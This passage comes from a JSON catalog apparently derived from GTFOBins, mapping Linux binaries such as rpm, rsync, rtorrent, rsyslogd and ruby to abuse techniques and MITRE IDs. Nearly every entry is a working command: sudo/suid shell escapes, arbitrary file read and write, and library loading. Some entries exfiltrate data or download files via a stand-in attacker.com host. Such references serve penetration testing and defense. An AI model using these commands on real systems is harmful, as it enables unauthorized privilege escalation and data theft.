data.","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/rlogin/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rlogin:upload:0:unprivileged","toolId":"gtfo:rlogin","toolName":"rlogin","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"rlogin -l DATA -p 12345 attacker.com","description":"The file is corrupted by leading and trailing spurious data.","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/rlogin/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rlwrap:file-write:0:sudo","toolId":"gtfo:rlwrap","toolName":"rlwrap","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"rlwrap -l /path/to/output-file echo DATA","description":"This adds timestamps to the output file. This relies on the external `echo` command.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rlwrap/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rlwrap:file-write:0:suid","toolId":"gtfo:rlwrap","toolName":"rlwrap","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"rlwrap -l /path/to/output-file echo DATA","description":"This adds timestamps to the output file. This relies on the external `echo` command.","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/rlwrap/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rlwrap:file-write:0:unprivileged","toolId":"gtfo:rlwrap","toolName":"rlwrap","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"rlwrap -l /path/to/output-file echo DATA","description":"This adds timestamps to the output file. This relies on the external `echo` command.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/rlwrap/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rlwrap:shell:0:sudo","toolId":"gtfo:rlwrap","toolName":"rlwrap","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"rlwrap /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rlwrap/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rlwrap:shell:0:suid","toolId":"gtfo:rlwrap","toolName":"rlwrap","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"rlwrap /bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/rlwrap/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rlwrap:shell:0:unprivileged","toolId":"gtfo:rlwrap","toolName":"rlwrap","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"rlwrap /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/rlwrap/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rpm:command:0:sudo","toolId":"gtfo:rpm","toolName":"rpm","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"rpm -ivh x-1.0-1.noarch.rpm","description":"Generate the RPM package with [fpm](https://github.com/jordansissel/fpm) and upload it to the target.\n\n```\necho /path/to/command >x.sh\nfpm -n x -s dir -t rpm -a all --before-install x.sh .\n```","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rpm/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rpm:inherit:0:sudo","toolId":"gtfo:rpm","toolName":"rpm","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:lua"],"command":"rpm --eval '%{lua:...}'","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rpm/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rpm:inherit:0:suid","toolId":"gtfo:rpm","toolName":"rpm","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:lua"],"command":"rpm --eval '%{lua:...}'","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/rpm/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rpm:inherit:0:unprivileged","toolId":"gtfo:rpm","toolName":"rpm","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload"],"nativeCategory":["inherit","from:lua"],"command":"rpm --eval '%{lua:...}'","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/rpm/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rpm:shell:0:sudo","toolId":"gtfo:rpm","toolName":"rpm","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"rpm --eval '%(/bin/sh 1>&2)'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rpm/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rpm:shell:0:suid","toolId":"gtfo:rpm","toolName":"rpm","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"rpm --eval '%(/bin/sh 1>&2)'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/rpm/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rpm:shell:0:unprivileged","toolId":"gtfo:rpm","toolName":"rpm","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"rpm --eval '%(/bin/sh 1>&2)'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/rpm/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rpm:shell:1:sudo","toolId":"gtfo:rpm","toolName":"rpm","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"rpm --pipe '/bin/sh 0<&1'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rpm/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rpm:shell:1:suid","toolId":"gtfo:rpm","toolName":"rpm","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"rpm --pipe '/bin/sh 0<&1'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/rpm/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rpm:shell:1:unprivileged","toolId":"gtfo:rpm","toolName":"rpm","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"rpm --pipe '/bin/sh 0<&1'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/rpm/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rpmdb:inherit:0:sudo","toolId":"gtfo:rpmdb","toolName":"rpmdb","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:lua"],"command":"rpmdb --eval '%{lua:...}'","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rpmdb/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rpmdb:inherit:0:suid","toolId":"gtfo:rpmdb","toolName":"rpmdb","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:lua"],"command":"rpmdb --eval '%{lua:...}'","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/rpmdb/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rpmdb:inherit:0:unprivileged","toolId":"gtfo:rpmdb","toolName":"rpmdb","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload"],"nativeCategory":["inherit","from:lua"],"command":"rpmdb --eval '%{lua:...}'","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/rpmdb/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rpmdb:shell:0:sudo","toolId":"gtfo:rpmdb","toolName":"rpmdb","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"rpmdb --eval '%(/bin/sh 1>&2)'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rpmdb/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rpmdb:shell:0:suid","toolId":"gtfo:rpmdb","toolName":"rpmdb","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"rpmdb --eval '%(/bin/sh 1>&2)'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/rpmdb/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rpmdb:shell:0:unprivileged","toolId":"gtfo:rpmdb","toolName":"rpmdb","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"rpmdb --eval '%(/bin/sh 1>&2)'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/rpmdb/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rpmquery:inherit:0:sudo","toolId":"gtfo:rpmquery","toolName":"rpmquery","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:lua"],"command":"rpmquery --eval '%{lua:...}'","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rpmquery/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rpmquery:inherit:0:suid","toolId":"gtfo:rpmquery","toolName":"rpmquery","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:lua"],"command":"rpmquery --eval '%{lua:...}'","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/rpmquery/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rpmquery:inherit:0:unprivileged","toolId":"gtfo:rpmquery","toolName":"rpmquery","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload"],"nativeCategory":["inherit","from:lua"],"command":"rpmquery --eval '%{lua:...}'","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/rpmquery/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rpmquery:shell:0:sudo","toolId":"gtfo:rpmquery","toolName":"rpmquery","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"rpmquery --eval '%(/bin/sh 1>&2)'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rpmquery/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rpmquery:shell:0:suid","toolId":"gtfo:rpmquery","toolName":"rpmquery","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"rpmquery --eval '%(/bin/sh 1>&2)'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/rpmquery/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rpmquery:shell:0:unprivileged","toolId":"gtfo:rpmquery","toolName":"rpmquery","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"rpmquery --eval '%(/bin/sh 1>&2)'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/rpmquery/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rpmverify:inherit:0:sudo","toolId":"gtfo:rpmverify","toolName":"rpmverify","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:lua"],"command":"rpmverify --eval '%{lua:...}'","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rpmverify/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rpmverify:inherit:0:suid","toolId":"gtfo:rpmverify","toolName":"rpmverify","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:lua"],"command":"rpmverify --eval '%{lua:...}'","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/rpmverify/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rpmverify:inherit:0:unprivileged","toolId":"gtfo:rpmverify","toolName":"rpmverify","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload"],"nativeCategory":["inherit","from:lua"],"command":"rpmverify --eval '%{lua:...}'","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/rpmverify/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rpmverify:shell:0:sudo","toolId":"gtfo:rpmverify","toolName":"rpmverify","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"rpmverify --eval '%(/bin/sh 1>&2)'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rpmverify/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rpmverify:shell:0:suid","toolId":"gtfo:rpmverify","toolName":"rpmverify","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"rpmverify --eval '%(/bin/sh 1>&2)'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/rpmverify/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rpmverify:shell:0:unprivileged","toolId":"gtfo:rpmverify","toolName":"rpmverify","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"rpmverify --eval '%(/bin/sh 1>&2)'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/rpmverify/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rsync:shell:0:sudo","toolId":"gtfo:rsync","toolName":"rsync","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"rsync -e '/bin/sh -c \"/bin/sh 0<&2 1>&2\"' x:x","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rsync/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rsync:shell:0:suid","toolId":"gtfo:rsync","toolName":"rsync","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"rsync -e '/bin/sh -p -c \"/bin/sh -p 0<&2 1>&2\"' x:x","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/rsync/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rsync:shell:0:unprivileged","toolId":"gtfo:rsync","toolName":"rsync","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"rsync -e '/bin/sh -c \"/bin/sh 0<&2 1>&2\"' x:x","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/rsync/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rsyslogd:command:0:sudo","toolId":"gtfo:rsyslogd","toolName":"rsyslogd","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"cat >/path/to/temp-file <<EOF\nmodule(load=\"imuxsock\")\n:msg, contains, \"somerandomstring\" ^/path/to/command\nEOF\n\nrsyslogd -f /path/to/temp-file","description":"In order for this to work, one must be able to trigger one event containing the chosen string, e.g., `somerandomstring`. One possibility is to attempt to connect to the victim host via SSH, for example:\n\n```\nssh somerandomstring@victim.com\n```","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rsyslogd/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rtorrent:shell:0:sudo","toolId":"gtfo:rtorrent","toolName":"rtorrent","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo 'execute = /bin/sh,-c,\"/bin/sh </dev/tty >/dev/tty 2>/dev/tty\"' >~/.rtorrent.rc\nrtorrent","description":"After the shell, exit with `Ctrl-Q`.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rtorrent/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rtorrent:shell:0:suid","toolId":"gtfo:rtorrent","toolName":"rtorrent","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo 'execute = /bin/sh,-p,-c,\"/bin/sh -p </dev/tty >/dev/tty 2>/dev/tty\"' >~/.rtorrent.rc\nrtorrent","description":"After the shell, exit with `Ctrl-Q`.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/rtorrent/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rtorrent:shell:0:unprivileged","toolId":"gtfo:rtorrent","toolName":"rtorrent","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo 'execute = /bin/sh,-c,\"/bin/sh </dev/tty >/dev/tty 2>/dev/tty\"' >~/.rtorrent.rc\nrtorrent","description":"After the shell, exit with `Ctrl-Q`.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/rtorrent/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ruby:download:0:sudo","toolId":"gtfo:ruby","toolName":"ruby","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"ruby -e 'require \"open-uri\"; download = URI.open(\"http://attacker.com/path/to/input-file\"); IO.copy_stream(download, \"/path/to/output-file\")'","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ruby/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ruby:download:0:unprivileged","toolId":"gtfo:ruby","toolName":"ruby","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download"],"nativeCategory":["download"],"command":"ruby -e 'require \"open-uri\"; download = URI.open(\"http://attacker.com/path/to/input-file\"); IO.copy_stream(download, \"/path/to/output-file\")'","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ruby/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ruby:file-read:0:sudo","toolId":"gtfo:ruby","toolName":"ruby","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ruby -e 'puts File.read(\"/path/to/input-file\")'","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ruby/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ruby:file-read:0:unprivileged","toolId":"gtfo:ruby","toolName":"ruby","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"ruby -e 'puts File.read(\"/path/to/input-file\")'","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ruby/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ruby:file-write:0:sudo","toolId":"gtfo:ruby","toolName":"ruby","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"ruby -e 'File.open(\"/path/to/output-file\", \"w+\") { |f| f.write(\"DATA\") }'","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ruby/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ruby:file-write:0:unprivileged","toolId":"gtfo:ruby","toolName":"ruby","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"ruby -e 'File.open(\"/path/to/output-file\", \"w+\") { |f| f.write(\"DATA\") }'","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ruby/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ruby:library-load:0:sudo","toolId":"gtfo:ruby","toolName":"ruby","name":"library-load","source":"GTFOBins","platform":["Linux"],"capability":["Library Load","Privilege Escalation"],"nativeCategory":["library-load"],"command":"ruby -e 'require \"fiddle\"; Fiddle.dlopen(\"/path/to/lib.so\")'","mitre":["T1574"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ruby/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check 